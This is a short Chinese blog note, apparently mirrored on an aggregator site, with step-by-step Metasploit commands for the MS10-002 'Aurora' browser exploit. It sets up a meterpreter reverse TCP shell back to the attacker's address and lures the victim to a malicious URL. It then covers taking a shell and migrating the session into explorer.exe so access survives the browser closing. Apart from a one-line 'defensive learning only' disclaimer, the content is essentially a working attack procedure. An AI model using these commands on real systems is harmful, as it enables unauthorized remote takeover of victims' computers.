【笔记】msf通过浏览器获取shell

2 years ago

source link: https://feiju12138.github.io/2022/06/08/msf%E9%80%9A%E8%BF%87%E6%B5%8F%E8%A7%88%E5%99%A8%E8%8E%B7%E5%8F%96shell/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

【笔记】msf通过浏览器获取shell

2022-06-08

msf通过浏览器获取Windows系统shell

本文仅用于网络信息防御学习

msf通过浏览器获取shell

ms10002：winxp的getshell漏洞
ms12063：win7的getshell漏洞

<ip_local>：配置攻击者地址

msf > use exploit/windows/browser/ms10_002_aurora
msf > set payload windows/meterpreter/reverse_tcp
msf > set SRVHOST <ip_local>
msf > set LHOST <ip_local>
msf > exploit

执行攻击后，会得到一个网址，当受害者访问这个网址后，即可获取shell

1：会话编号

# 查看所有会话
msf > sessions -i

# 使用一个会话
msf > sessions -i 1

# 获取shell
meterpreter > shell

由于受害者关闭浏览器进程后，会话会失效，所以可以移动会话绑定的进程，推荐绑定explorer.exe进程

<pid>：进程的pid

# 使用一个会话
msf > sessions -i 1

# 查看所有进程
meterpreter > ps

# 移动会话绑定的进程
meterpreter > migrate <pid>

哔哩哔哩——千锋教育网络安全学院

# Metasploit Framework

【笔记】PHP一句话木马

Recommend

【笔记】msf通过浏览器获取shell

【笔记】msf通过浏览器获取shell

msf通过浏览器获取shell

Recommend

ROG THOR雷神II 1600W钛金版开箱图赏：真正的旗舰，真正的雷神之锤

Efficient OAuth Authorisation Management in Azure API Management

Azure Load Testing: create tests faster, distribute input data, and much more

watchOS 9 hands-on: The new and updated Apple Watch faces - 9to5Mac

June 7, 2022 – iOS 16 Tapback changes, iPhone 14 always-on screen

Performance and intent - the content tracking goals for Contentgine's Content In...

Discover the WPF WOW - World of Windows 11 (New Theme)

8 Tips to Use Google Chrome as a Student

Question - Can't reinstall magisk ( Stuck in fastboot ) | XDA Forums

2022年中国智能学习设备市场规模及竞争格局分析 To B与To C各占半壁江山【组图】

About Joyk